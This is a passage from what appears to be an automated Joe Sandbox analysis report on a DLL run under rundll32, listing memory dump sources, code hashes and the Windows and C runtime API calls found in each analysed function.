                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1615547351-0
                                                                                                                                    • Opcode ID: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                                    • Instruction ID: 02293aacd12bdd5b71dc2e1620005b8d21a8bb506af1f41bdeabb16afe14deca
                                                                                                                                    • Opcode Fuzzy Hash: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                                    • Instruction Fuzzy Hash: C0118675504249FFDB05DFA4DC819BE3BA9FB08350F118929F915CE2A1E631DA50C754
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • FindResourceA.KERNEL32 ref: 100170A7
                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 100170AF
                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 100170C1
                                                                                                                                    • FreeResource.KERNEL32(00000000), ref: 1001710B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Resource$FindFreeLoadLock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1078018258-0
                                                                                                                                    • Opcode ID: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                                    • Instruction ID: b090516e65dfb2cc0079b63036416f790ce173b21e3ea297a20d0f4a61f138d4
                                                                                                                                    • Opcode Fuzzy Hash: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                                    • Instruction Fuzzy Hash: 0A11DA34600B61FBC711DF68CD88AAAB3B4FB08295F118119E8468B550E3B0ED80D6A0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 1001512A
                                                                                                                                      • Part of subcall function 10015D26: __EH_prolog3.LIBCMT ref: 10015D2D
                                                                                                                                    • __strdup.LIBCMT ref: 1001514C
                                                                                                                                    • GetCurrentThread.KERNEL32(00000004,10001031,00000000), ref: 10015179
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 10015182
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4206445780-0
                                                                                                                                    • Opcode ID: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
                                                                                                                                    • Instruction ID: 8b11c4afa576c4c19aa6f664ae71e644c3fa519ec3c9c99d11d7e99696a9cddb
                                                                                                                                    • Opcode Fuzzy Hash: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
                                                                                                                                    • Instruction Fuzzy Hash: C2218EB0801B40DFC722CF7A854525AFBF8FFA4601F14891FE59A8A721DBB4A481CF04
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10017742
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 1001774B
                                                                                                                                    • _swprintf.LIBCMT ref: 10017768
                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10017779
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4210924919-0
                                                                                                                                    • Opcode ID: 3276be8801f00fc95fb59eac867b2e4799b3078c36edba842ee4648e314c5080
                                                                                                                                    • Instruction ID: e9188d0bda7618ab121d067f9e2349c71729dbb6fdaec1ca83b1d39ed15240a7
                                                                                                                                    • Opcode Fuzzy Hash: 3276be8801f00fc95fb59eac867b2e4799b3078c36edba842ee4648e314c5080
                                                                                                                                    • Instruction Fuzzy Hash: A901C072500219FBEB00DF648D85FAFB3BCEF09704F010429FA05EB181EAB0E90187A5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • FindResourceA.KERNEL32 ref: 10017C70
                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 10017C7C
                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 10017C8A
                                                                                                                                    • FreeResource.KERNEL32(00000000), ref: 10017CB8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Resource$FindFreeLoadLock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1078018258-0
                                                                                                                                    • Opcode ID: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                                    • Instruction ID: 37c567c5ed2abd0c262b3d9c14b2c0b98263367eb1ad4cff580600f06ae044bd
                                                                                                                                    • Opcode Fuzzy Hash: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                                    • Instruction Fuzzy Hash: 44112875600219EFDB409F95CA88AAE7BB9FF09390F108069F9099B260DB71DD40CFA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3354205298-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10021648
                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000), ref: 1002164E
                                                                                                                                    • DuplicateHandle.KERNEL32 ref: 10021651
                                                                                                                                    • GetLastError.KERNEL32(?), ref: 1002166C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3704204646-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • EnableMenuItem.USER32 ref: 100155F0
                                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                    • GetFocus.USER32 ref: 10015607
                                                                                                                                    • GetParent.USER32(?), ref: 10015615
                                                                                                                                    • SendMessageA.USER32 ref: 10015628
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: EnableException@8FocusItemMenuMessageParentSendThrow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4211600527-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • GetTopWindow.USER32(00000000), ref: 1001B97C
                                                                                                                                    • GetTopWindow.USER32(00000000), ref: 1001B9BB
                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 1001B9D9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2353593579-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 1001B338
                                                                                                                                    • GetTopWindow.USER32(00000000), ref: 1001B34B
                                                                                                                                      • Part of subcall function 1001B32D: GetWindow.USER32(00000000,00000002), ref: 1001B392
                                                                                                                                    • GetTopWindow.USER32(?), ref: 1001B37B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Item
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 369458955-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3016257755-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • SysStringLen.OLEAUT32(?), ref: 1002BC45
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC5D
                                                                                                                                    • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002BC65
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC84
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3384502665-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 100352EC: __getptd_noexit.LIBCMT ref: 100352ED
                                                                                                                                      • Part of subcall function 100352EC: __amsg_exit.LIBCMT ref: 100352FA
                                                                                                                                    • __amsg_exit.LIBCMT ref: 1003A571
                                                                                                                                    • __lock.LIBCMT ref: 1003A581
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 1003A59E
                                                                                                                                    • InterlockedIncrement.KERNEL32(00501520), ref: 1003A5C9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2880340415-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • FindResourceA.KERNEL32 ref: 1001DCA7
                                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001703A,?,?,100128C0,67083A02), ref: 1001DCB3
                                                                                                                                    • LockResource.KERNEL32(00000000,?,?,?,?,1001703A,?,?,100128C0,67083A02), ref: 1001DCC0
                                                                                                                                    • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1001703A,?,?,100128C0,67083A02), ref: 1001DCDB
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Resource$FindFreeLoadLock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1078018258-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                                    • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                                    • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                                    • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                                      • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ActiveEnable$FreeResource
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 253586258-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 1002E228
                                                                                                                                    • GetTickCount.KERNEL32 ref: 1002E235
                                                                                                                                    • CoFreeUnusedLibraries.OLE32 ref: 1002E244
                                                                                                                                    • GetTickCount.KERNEL32 ref: 1002E24A
                                                                                                                                      • Part of subcall function 1002E1AF: CoFreeUnusedLibraries.OLE32 ref: 1002E1F3
                                                                                                                                      • Part of subcall function 1002E1AF: OleUninitialize.OLE32 ref: 1002E1F9
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 685759847-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClearVariant
                                                                                                                                    • String ID: (
                                                                                                                                    • API String ID: 1473721057-3887548279
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog3
                                                                                                                                    • String ID: @
                                                                                                                                    • API String ID: 431132790-2766056989
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 100150B5
                                                                                                                                    • PathFindExtensionA.SHLWAPI(?), ref: 100150CB
                                                                                                                                      • Part of subcall function 10014B27: _strcpy_s.LIBCMT ref: 10014B33
                                                                                                                                      • Part of subcall function 10014DA8: __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                                      • Part of subcall function 10014DA8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                                      • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                                      • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                                      • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                                      • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                                      • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                                      • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                                      • Part of subcall function 10014DA8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                                    Strings
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                                    • String ID: %s.dll
                                                                                                                                    • API String ID: 3444012488-3668843792
                                                                                                                                    • Opcode ID: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
                                                                                                                                    • Instruction ID: 0816ccb3c2c5dc3d5c2f43fd153125c4ae2bbce82e663fde520804fb1fdab18a
                                                                                                                                    • Opcode Fuzzy Hash: 658e8660b57156c47c50295d269887a352ab673736f5c816275cebcb6cd6bc48
                                                                                                                                    • Instruction Fuzzy Hash: 9901B971A10118BBDF09DB74DD96AEEB3B8DF04B01F0105E9EA02DB140EEB1EE448A61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,100025CE,00000000,00000000), ref: 10002045
                                                                                                                                    • SetLastError.KERNEL32(0000007E), ref: 10002087
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLastRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4100373531-0
                                                                                                                                    • Opcode ID: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                                    • Instruction ID: bdea880ba7c0c5bd5d2dbe714977ff7d927dc75702b615567210b407e242d671
                                                                                                                                    • Opcode Fuzzy Hash: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                                    • Instruction Fuzzy Hash: B181A8B4A00209EFDB04CF94C980AAEB7B1FF48354F248159E919AB355D735EE82CF94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 10020B95
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?), ref: 10020BA5
                                                                                                                                    • LocalFree.KERNEL32(?), ref: 10020BAE
                                                                                                                                    • TlsSetValue.KERNEL32(?,00000000), ref: 10020BC0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2949335588-0
                                                                                                                                    • Opcode ID: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                                    • Instruction ID: af4df8c6ab00e3b134578f48d56f113cbd39bdf93991f651abc1e22c3acb8acd
                                                                                                                                    • Opcode Fuzzy Hash: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                                    • Instruction Fuzzy Hash: 70113435600305EFE721CF54D9C4B9AB7AAFF0A35AF508429F5528B5A2DB71F980CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
